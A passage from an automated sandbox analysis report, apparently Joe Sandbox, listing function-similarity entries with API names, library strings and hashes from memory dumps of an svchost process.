                                                                                                                                                                                • Instruction Fuzzy Hash: 0A01B1B9A1260A55FD089B537E147A522D67718BC9FC48635CD7D47380EF3D80A54340
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errno$_strdupfreestrtoul
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2267039244-0
                                                                                                                                                                                • Opcode ID: 72ad6bdcad7d051e807e98e932602b08ea7d993d8f80e8c610641ad4cadf0211
                                                                                                                                                                                • Instruction ID: c04977e0f04fe4f0e4c3dc35215b3e0fb64cfdcf71eed035e4399835e8c495fa
                                                                                                                                                                                • Opcode Fuzzy Hash: 72ad6bdcad7d051e807e98e932602b08ea7d993d8f80e8c610641ad4cadf0211
                                                                                                                                                                                • Instruction Fuzzy Hash: 10111C76A09E828AEB618F29D40436D6360FB4CBD5F484031CB5D87784DF3CE49A8718
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: 5d30cc7d324f8428d59c4bca202ebd4b1bd4b06b5934f03e18167b81d9eac286
                                                                                                                                                                                • Instruction ID: 3225c60ec645403e1ad05a71243e9ec978dc8bf979abae8a8941286c54c71cd5
                                                                                                                                                                                • Opcode Fuzzy Hash: 5d30cc7d324f8428d59c4bca202ebd4b1bd4b06b5934f03e18167b81d9eac286
                                                                                                                                                                                • Instruction Fuzzy Hash: BDF0F929615A82C2DB549F6AED5443863A0EF8CFEAF081031CE5E03724CF2CD8968B14
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                • Opcode ID: 69db70a9cee0fa5faa9726b60b4457947116779cb91af67add1ef795b65ba162
                                                                                                                                                                                • Instruction ID: 9d097d5d489780a8de0178ba0c3b045bff2ce9a016efd8b214a32063f330250d
                                                                                                                                                                                • Opcode Fuzzy Hash: 69db70a9cee0fa5faa9726b60b4457947116779cb91af67add1ef795b65ba162
                                                                                                                                                                                • Instruction Fuzzy Hash: 67819C72F0F642ADFB654F3981502BD26A0EBD1BD8F598035CB0A57294CB3DEA41B781
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                • String ID: false$true
                                                                                                                                                                                • API String ID: 3668304517-2658103896
                                                                                                                                                                                • Opcode ID: a8b09fed5aff4d72c608d527b1d3897585dee335be4e528a25b8fa2794678d30
                                                                                                                                                                                • Instruction ID: efd138ef6d618d00bdc33003bf2207f9dc945f1f4dbfc486b2c64f80bcba0b6c
                                                                                                                                                                                • Opcode Fuzzy Hash: a8b09fed5aff4d72c608d527b1d3897585dee335be4e528a25b8fa2794678d30
                                                                                                                                                                                • Instruction Fuzzy Hash: B7616E62F0AA45A9FB10DFB9E4402AC23B1EB457A8F404635DE5D277D8EE3CD646D340
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                                                                                • String ID: invalid string position
                                                                                                                                                                                • API String ID: 3936042273-1799206989
                                                                                                                                                                                • Opcode ID: aa3ab83a08a45fd305cd423b1d0d9b2a89f507f07889c7c52cf607cf644a934f
                                                                                                                                                                                • Instruction ID: b093909e2478aebabf97833f2d3f8f50dd4ec12f11274044c0559e437315f441
                                                                                                                                                                                • Opcode Fuzzy Hash: aa3ab83a08a45fd305cd423b1d0d9b2a89f507f07889c7c52cf607cf644a934f
                                                                                                                                                                                • Instruction Fuzzy Hash: EC41F262B0B686A5FE14AF76A9443BC1381DB05BF5F544631DE2C07BC5EE7CE682A310
                                                                                                                                                                                APIs
                                                                                                                                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,00000000,00007FF8B83BB992), ref: 00007FF8B83BB32B
                                                                                                                                                                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,00000000,?,00000000,00007FF8B83BB992), ref: 00007FF8B83BB35D
                                                                                                                                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,00000000,00007FF8B83BB992), ref: 00007FF8B83BB365
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errno$strtoul
                                                                                                                                                                                • String ID: %u.%u.%u.%u
                                                                                                                                                                                • API String ID: 2478088314-1542503432
                                                                                                                                                                                • Opcode ID: 906544cfcd58bf2d0bc374deda900d360837ec46f24052f2228663a47d76e130
                                                                                                                                                                                • Instruction ID: ee8bd78d1655865ed8fb3bc751083722d96cb555a88df945ab55116b6e7384e6
                                                                                                                                                                                • Opcode Fuzzy Hash: 906544cfcd58bf2d0bc374deda900d360837ec46f24052f2228663a47d76e130
                                                                                                                                                                                • Instruction Fuzzy Hash: 02518372A1C6568EF6644B1DA15023A7A91FF897E0F1D1035EB8E17AD5CF3CE8429B08
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00007FF8A7F8F630: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF8A7F8F64D
                                                                                                                                                                                  • Part of subcall function 00007FF8A7F8F630: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF8A7F8F670
                                                                                                                                                                                  • Part of subcall function 00007FF8A7F8F630: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF8A7F8F705
                                                                                                                                                                                  • Part of subcall function 00007FF8A7F07290: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF8A7F072BB
                                                                                                                                                                                  • Part of subcall function 00007FF8A7F07290: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF8A7F072E0
                                                                                                                                                                                  • Part of subcall function 00007FF8A7F07290: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF8A7F0730A
                                                                                                                                                                                  • Part of subcall function 00007FF8A7F07290: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF8A7F0739B
                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF8A7F070BC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Setgloballocale_invalid_parameter_noinfo_noreturnstd::locale::_
                                                                                                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                • API String ID: 3851964404-1866435925
                                                                                                                                                                                • Opcode ID: e5c0ec06b9661a7bde7a75b3d54f6434c7eb0ce4e31e1f8c2524391af0a23aa4
                                                                                                                                                                                • Instruction ID: d3cf705365f69d76a211fbfac32dc8dce7358c65ddc13bd55fa9c9dc21b89c82
                                                                                                                                                                                • Opcode Fuzzy Hash: e5c0ec06b9661a7bde7a75b3d54f6434c7eb0ce4e31e1f8c2524391af0a23aa4
                                                                                                                                                                                • Instruction Fuzzy Hash: 11419F32A05B4196EB20CF25E88036D73A0FB44BD4F644235DA9D57BA5EF3DE682E350
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                                                                • String ID: ios_base::failbit set
                                                                                                                                                                                • API String ID: 1944019136-3924258884
                                                                                                                                                                                • Opcode ID: 7e4b2cd8b524ce5ef235f72560f4ab572732e068ca0fa397373762ac220a6763
                                                                                                                                                                                • Instruction ID: 197feeab2c75a5721493faa6929743a06fc963bf23ad6393cb01a8ee0f017c30
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e4b2cd8b524ce5ef235f72560f4ab572732e068ca0fa397373762ac220a6763
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C418362E1AB8591EA109F35E4413AD6361FF997E4F509331EAAC027D9EF2CE2D5D300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateEventcalloc
                                                                                                                                                                                • String ID: d
                                                                                                                                                                                • API String ID: 2382962142-2564639436
                                                                                                                                                                                • Opcode ID: f7e2894db741331a8fc1dc95fb01fb035a612877f8dc08512d1d4fdd7cec79f2
                                                                                                                                                                                • Instruction ID: 76dde9cdaa85d345f19a5247855630d46dbbdda3dd28b3842ef8db1677d9a043
                                                                                                                                                                                • Opcode Fuzzy Hash: f7e2894db741331a8fc1dc95fb01fb035a612877f8dc08512d1d4fdd7cec79f2
                                                                                                                                                                                • Instruction Fuzzy Hash: 90413F32A28A8291EB40DF29D4512F963A5FF8CBC8F8C4435DB4E4669AEF3CD546C714
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: PRINTF_EXPONENT_DIGITS$gfff$gfff
                                                                                                                                                                                • API String ID: 0-1261492566
                                                                                                                                                                                • Opcode ID: da8ce11a2fade850127e0c5378c7a24e8e704a5545f603b45819f770f16e41ff
                                                                                                                                                                                • Instruction ID: e60f911440a172068f12104ac4e70cbbdd0ac0ef6e8d3bd44c5d4504c6dad859
                                                                                                                                                                                • Opcode Fuzzy Hash: da8ce11a2fade850127e0c5378c7a24e8e704a5545f603b45819f770f16e41ff
                                                                                                                                                                                • Instruction Fuzzy Hash: 9221F7727100098BDF1C8E3F9810B397692E788794FD8C229DE26CB7D4E679D840C740
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: PRINTF_EXPONENT_DIGITS$gfff$gfff
                                                                                                                                                                                • API String ID: 0-1261492566
                                                                                                                                                                                • Opcode ID: 85955a5085edaaf0561074ca5ca8f770628616aab478941b9f37ea72fd5f7d96
                                                                                                                                                                                • Instruction ID: f0728a63a2fa41e00105a4ea9d10a082bc03974b8ff5ce3e6025864f6d96f453
                                                                                                                                                                                • Opcode Fuzzy Hash: 85955a5085edaaf0561074ca5ca8f770628616aab478941b9f37ea72fd5f7d96
                                                                                                                                                                                • Instruction Fuzzy Hash: BC214BB67100458BDF0C8F3FA850A2A7692B789B94F98C739DD26CB7D4E678D904CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memmoverecvfrom
                                                                                                                                                                                • String ID: Internal error: Unexpected packet$Received too short packet
                                                                                                                                                                                • API String ID: 3882332696-1028201440
                                                                                                                                                                                • Opcode ID: e7919fc643c6f6b844ecafe7d2e752d109b6950c4caabaa5768224c74e7e4585
                                                                                                                                                                                • Instruction ID: 4884514c9c4bda729235aae070bcd75861712ee27e8524e54f23ce23f230f5e0
                                                                                                                                                                                • Opcode Fuzzy Hash: e7919fc643c6f6b844ecafe7d2e752d109b6950c4caabaa5768224c74e7e4585
                                                                                                                                                                                • Instruction Fuzzy Hash: 68319272608A828AEA64DF29E5907FA77A0FB48784F044036DB5D47755DF3CE066CB44
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=
                                                                                                                                                                                • String ID: FALSE$TRUE
                                                                                                                                                                                • API String ID: 356670603-1412513891
                                                                                                                                                                                • Opcode ID: e9cb4a01c6f0703ce4c3f7542200d87cae740b641891ba41806b1527b6bee8e9
                                                                                                                                                                                • Instruction ID: 42f3098fb37a8ccf110f0c2e4ccbce3d226a4193051a13b3de5a8b10a38ec420
                                                                                                                                                                                • Opcode Fuzzy Hash: e9cb4a01c6f0703ce4c3f7542200d87cae740b641891ba41806b1527b6bee8e9
                                                                                                                                                                                • Instruction Fuzzy Hash: BD21D322B0C35745FA21962D84601BA37E6AF0D7C4F8D4431CF4D46686EF5CE84BCB48
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: inet_pton
                                                                                                                                                                                • String ID: SOCKS5 GSS-API protection not yet implemented.$SOCKS5 connect request$SOCKS5 connect to %s:%d (remotely resolved)
                                                                                                                                                                                • API String ID: 1350483568-1770377672
                                                                                                                                                                                • Opcode ID: c401999cac1a823ddafb3c28bc7e5731ee85e1e56b0e38fa8f949547740da7cb
                                                                                                                                                                                • Instruction ID: b42c55a7eaedab733f1d6b25bda4699930dcca3c4d5edf35787b03055189472b
                                                                                                                                                                                • Opcode Fuzzy Hash: c401999cac1a823ddafb3c28bc7e5731ee85e1e56b0e38fa8f949547740da7cb
                                                                                                                                                                                • Instruction Fuzzy Hash: 33317A62A0D6C1C6EB618B28D8403AD3BA0E749BD8F4D4136CB4D4B295EF3CE58BC715
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
